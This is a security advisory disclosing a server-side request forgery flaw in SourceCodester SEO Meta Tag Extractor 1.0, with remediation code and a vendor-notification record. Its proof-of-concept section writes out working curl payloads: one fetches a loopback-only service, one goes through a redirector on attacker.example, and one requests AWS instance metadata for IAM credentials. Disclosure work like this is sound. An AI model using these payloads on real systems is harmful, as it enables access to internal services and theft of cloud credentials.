# SourceCodester SEO Meta Tag Extractor 1.0 - Server-Side Request Forgery via URL Parameter

## Vulnerability Information

| Field       | Detail                                      |
|-------------|---------------------------------------------|
| **Product** | SEO Meta Tag Extractor                      |
| **Vendor**  | SourceCodester (Author: rems / remyandrade) |
| **Version** | 1.0                                         |
| **Type**    | Server-Side Request Forgery (CWE-918)       |
| **Author**  | Kevin Chiang                                |
| **Date**    | 2026-05-11                                  |
| **CVSS**    | 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)   |

---

## Affected Component

- **Entry Endpoint**: `index.php` (POST handler)
- **Vulnerable Function**: `fetchMetaTags($url)`
- **Sink #1**: `get_headers($url, 1)` at `index.php:8`
- **Sink #2**: `file_get_contents($url)` at `index.php:13`
- **Parameter**: `url` (application/x-www-form-urlencoded, POST)

---

## Description

A server-side request forgery vulnerability was found in SourceCodester SEO Meta Tag Extractor 1.0. It affects the function `fetchMetaTags()` in the file `index.php`. The application accepts a user-supplied URL via the `url` POST parameter and passes it directly to `get_headers()` and `file_get_contents()` without any restriction against private, loopback, or link-local IP ranges.

The only validation performed is `FILTER_VALIDATE_URL`, which checks syntactic URL validity but does not block internal addresses. In addition, `file_get_contents()` follows HTTP redirects by default, allowing an attacker-controlled external URL to redirect the server-side fetch to an internal endpoint, bypassing any naive hostname/IP blacklist that may be added later.

The root cause is the absence of network-layer validation on the attacker-controlled URL:

```php
// index.php (lines 3-13)
function fetchMetaTags($url) {
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        return ['error' => 'Invalid URL format'];
    }
    $headers = get_headers($url, 1);      // SINK #1
    if (strpos($headers[0], '200') === false) {
        return ['error' => 'URL not reachable'];
    }
    $html = @file_get_contents($url);     // SINK #2
    ...
}
```

The parsed HTML content is then echoed back to the attacker via the result page (title, meta description, OG tags, links), enabling a fully read-capable SSRF.

---

## Steps to Reproduce

### Environment

- OS: Ubuntu 22.04 LTS
- Web Server: PHP 8.1.2 built-in development server
- PHP: 8.1.2
- Test URL: `http://192.168.2.132:8080/`

### Steps

1. Deploy SEO Meta Tag Extractor 1.0 on a host that can reach a service not exposed externally, such as one bound to the loopback interface (e.g., a Python HTTP server, an admin panel, or Redis) or the cloud metadata service at `169.254.169.254`.

2. Start the vulnerable application:

   ```bash
   cd seo-meta-tag-extractor/
   php -S 0.0.0.0:8080
   ```

3. From an external host, verify the internal service is NOT directly reachable:

   ```bash
   curl http://192.168.2.132:9999/
   # → connection refused
   ```

4. Submit the SSRF payload to the vulnerable application:

   ```bash
   curl -X POST 'http://192.168.2.132:8080/' \
     --data-urlencode 'url=http://127.0.0.1:9999/'
   ```

5. Observe that the HTTP response body contains content fetched from `127.0.0.1:9999` (title, meta tags, etc.) - the server made the request on behalf of the attacker.

---

## Proof of Concept

### Simulated Internal Service

On the victim host, run a service bound to loopback only:

```bash
mkdir -p /tmp/internal && cd /tmp/internal
cat > index.html <<'EOF'
<!DOCTYPE html>
<html><head>
<title>INTERNAL SECRET PAGE</title>
<meta name="description" content="Bound to 127.0.0.1 only.">
<meta name="keywords" content="admin,DB-password=hunter2,internal">
</head><body><h1>SSRF success</h1></body></html>
EOF

# --bind 127.0.0.1 → reachable from the local host (including PHP) only, NOT from the external network
python3 -m http.server 9999 --bind 127.0.0.1
```

### Vulnerable HTTP Request

```http
POST /index.php HTTP/1.1
Host: 192.168.2.132:8080
Content-Type: application/x-www-form-urlencoded

url=http%3A%2F%2F127.0.0.1%3A9999%2F
```

### cURL PoC

```bash
# 1. Confirm internal service is not externally accessible
curl --max-time 3 http://192.168.2.132:9999/
# → curl: (7) Failed to connect ...

# 2. Trigger SSRF via the vulnerable application
curl -s -X POST 'http://192.168.2.132:8080/' \
  --data-urlencode 'url=http://127.0.0.1:9999/' \
  | grep -i 'INTERNAL SECRET'
# → <span class="meta-value">INTERNAL SECRET PAGE</span>
```

### Expected Result

The HTTP response from the vulnerable application contains the title `INTERNAL SECRET PAGE` and other metadata fetched from the loopback-only service, proving that the server-side request was successfully made on behalf of an unauthenticated remote attacker.

### Redirect Bypass PoC (defeats naive IP blacklists)

Host a 302 redirector under attacker control:

```php
<?php
// redir.php on attacker.example
header("Location: http://127.0.0.1:9999/");
exit;
```

Then submit the public URL:

```bash
curl -X POST 'http://192.168.2.132:8080/' \
  --data-urlencode 'url=http://attacker.example/redir.php'
```

`file_get_contents()` follows the 302 and still fetches the internal resource, even if the input URL passes any blacklist check.

### Cloud Metadata Attack (deployment-dependent)

When deployed on AWS EC2 without IMDSv2 enforced:

```bash
curl -X POST 'http://<target>/index.php' \
  --data-urlencode 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
```

→ The application's response leaks the IAM role name, which can be chained with a second request to retrieve temporary credentials.
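
### Validation Check Against the PoC Payloads

All three payload URLs used in the PoCs above are syntactically valid, which is why the application's only check does not stop them. The following is a minimal sketch that runs the same `filter_var()` call against those payloads outside the application; the `$payloads` and `$results` variable names are illustrative and do not appear in `index.php`.

```php
<?php
// Payload URLs copied from the PoC sections above.
$payloads = [
    'http://127.0.0.1:9999/',
    'http://attacker.example/redir.php',
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
];

$results = [];
foreach ($payloads as $url) {
    // Same check as fetchMetaTags(): URL syntax only, no inspection of the target address.
    $results[$url] = filter_var($url, FILTER_VALIDATE_URL) !== false;
    echo ($results[$url] ? 'accepted' : 'rejected') . "  $url\n";
}
```

Each of the three URLs should be reported as accepted, since `FILTER_VALIDATE_URL` never looks at which network the host belongs to.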

---

## Code Flow

```
[Remote Attacker]
    │
    │  POST /index.php  (url=http://127.0.0.1:9999/)
    ↓
fetchMetaTags($url)                              index.php:3
    │
    │  filter_var($url, FILTER_VALIDATE_URL)
    │    └─ syntactic check only; private IPs PASS
    │
    ↓
get_headers($url, 1)                             index.php:8        【SINK #1】
    │  PHP issues HTTP request to 127.0.0.1:9999
    │
    ↓
file_get_contents($url)                          index.php:13       【SINK #2】
    │  PHP fetches response body
    │  (follows HTTP 3xx redirects by default)
    │
    ↓
DOMDocument::loadHTML($html)                     index.php:18-19
    │  Parses internal-only content
    │
    ↓
Echo extracted meta tags back to attacker        index.php:117-217
    │  title, description, OG/Twitter cards, canonical, h1, etc.
    ↓
Internal data exposed to unauthenticated remote attacker
```

---

## Impact

An unauthenticated remote attacker can:

- Probe internal/private network services not reachable from the public Internet (loopback, RFC 1918, link-local).
- Read responses from internal HTTP-speaking services through the echoed meta-tag output (full read-capable SSRF).
- Enumerate open ports on the host and adjacent network by comparing the `URL not reachable` branch with the successful response branch.
- On cloud deployments without IMDSv2 enforcement, retrieve cloud instance metadata (e.g., AWS IMDS at `169.254.169.254`) including temporary IAM credentials, escalating to cloud account compromise.
- Bypass IP-based access control on internal admin panels that trust `127.0.0.1` or the host's primary interface.
- Defeat naive URL blacklists by using attacker-controlled HTTP redirects to internal addresses.

---

## Remediation

The recommended fix combines four controls in `fetchMetaTags()`:

1. **Scheme allowlist**: accept only `http` and `https` (the existing regex on `index.php:64` also allows `ftp` / `ftps`).
2. **Hostname resolution + IP allowlist**: resolve the hostname with `gethostbynamel()` (IPv4 only; IPv6 records need a separate lookup such as `dns_get_record()` with `DNS_AAAA`) and reject any address inside private, loopback, link-local, or multicast ranges (RFC 1918, `127.0.0.0/8`, `169.254.0.0/16`, `::1`, `fc00::/7`, etc.).
3. **Disable HTTP redirect following**: use a custom stream context with `'follow_location' => 0`, and re-validate the redirect target against the same allowlist for each hop.
4. **Set request timeout and max content length** to limit abuse for port scanning and denial-of-service.

Example patch sketch:

```php
function isPublicUrl($url) {
    $parts = parse_url($url);
    // Control 1: only http and https are accepted.
    if (!$parts || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return false;
    }
    // Control 2: resolve the host (IPv4 only) and fail closed if resolution fails.
    $ips = gethostbynamel($parts['host'] ?? '');
    if (!$ips) {
        return false;
    }
    foreach ($ips as $ip) {
        // Reject private (RFC 1918) and reserved ranges; the latter include loopback and link-local.
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}
```

---

## Vendor Notification

| Date       | Action                                          |
|------------|-------------------------------------------------|
| 2026-05-11 | Vendor notified via SourceCodester contact form |

---

## References

- Vendor homepage: https://www.sourcecodester.com/
- Project page: https://www.sourcecodester.com/php/18271/seo-meta-tag-extractor-using-php-and-javascript-source-code.html
- Author page: https://www.sourcecodester.com/users/remyandrade
- Related CWE: CWE-918 (Server-Side Request Forgery)
- Related CWE: CWE-441 (Unintended Proxy or Intermediary - 'Confused Deputy')
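
---

## Appendix: Redirect-Safe Fetch Sketch

Remediation items 3 and 4 (no automatic redirects, a timeout, and a response size cap) are not covered by the `isPublicUrl()` patch sketch. The following is one possible way to express them with a stream context, offered as a sketch rather than a vetted fix. The function name `fetchWithoutRedirects()`, the `$isAllowed` callback, the 5-second timeout, and the 1 MiB cap are all assumptions made for illustration; none of them come from the original application.

```php
<?php
// Hypothetical helper (not part of the original application).
// $isAllowed is any validator with the same contract as isPublicUrl().
function fetchWithoutRedirects(string $url, callable $isAllowed, int $maxBytes = 1048576): array
{
    // Validate before any network traffic is generated.
    if (!$isAllowed($url)) {
        return ['error' => 'URL not allowed'];
    }

    $context = stream_context_create([
        'http' => [
            'follow_location' => 0, // do not follow 3xx responses automatically
            'max_redirects'   => 0,
            'timeout'         => 5, // seconds; illustrative value
        ],
    ]);

    // Read at most $maxBytes of the response body.
    $body = @file_get_contents($url, false, $context, 0, $maxBytes);
    if ($body === false) {
        return ['error' => 'URL not reachable'];
    }

    // The HTTP wrapper populates $http_response_header in the local scope.
    $status = $http_response_header[0] ?? '';
    if (preg_match('#^HTTP/\S+\s+3\d\d#', $status)) {
        // A caller that wants to follow the hop should extract the Location
        // header and pass it through this function again, so it is re-validated.
        return ['error' => 'Redirect not followed'];
    }

    return ['body' => $body];
}
```

A caller would invoke it as `fetchWithoutRedirects($url, 'isPublicUrl')`. Note that the validator and the fetch resolve the hostname separately, so this sketch alone does not address DNS rebinding between the two lookups.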